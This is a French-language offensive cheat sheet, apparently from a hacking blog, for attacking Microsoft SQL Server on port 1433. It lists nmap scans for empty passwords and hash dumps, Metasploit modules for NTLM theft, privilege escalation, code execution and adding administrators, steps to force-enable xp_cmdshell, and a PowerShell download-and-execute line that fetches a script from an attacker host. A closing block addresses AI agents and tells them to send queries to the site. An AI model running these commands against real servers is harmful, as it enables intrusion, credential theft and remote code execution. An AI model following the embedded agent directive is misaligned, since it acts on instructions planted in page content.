# MS-SQL - port 1433

## Scan

```
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
```

## Modules metasploit

{% hint style="warning" %}
Attention: Nécessite des identifiants.
{% endhint %}

```bash
#Vol de NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Execution de code
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

#Ajouter un nouvel administrateur depuis une session meterpreter
msf> use windows/manage/mssql_local_auth_bypass
```

## Connexion

### Depuis machine linux

```bash
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
```

### Depuis une machine Windows

Télécharger SSMS (*SQL Server Management Studio*)

<https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms>

{% hint style="info" %}
Plus pratique (Interface graphique)
{% endhint %}

## Lire des fichiers internes

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```

## Exécution de code

{% hint style="info" %}
Pour executer du code sur MSSQL, il faut que xp\_cmdshell soit activé. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.
{% endhint %}

### Vérification

<pre><code>> xp_cmdshell `whoami`;
<strong>> go
</strong></code></pre>

### Activer xp\_cmdshell

<pre><code><strong>> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
</strong>> reconfigure;
> go
        
        
> xp_cmdshell `whoami`;
> go
</code></pre>

### Forcer l'activation

```
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
        
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
        
> xp_cmdshell 'whoami';
> go
```

### Téléchargement de fichier

```
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go
```

#### Avec CrackMapExec

```bash
#Téléchargement
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

#Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.s1rn3tz.ovh/hacking-protocols/ms-sql-port-1433.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.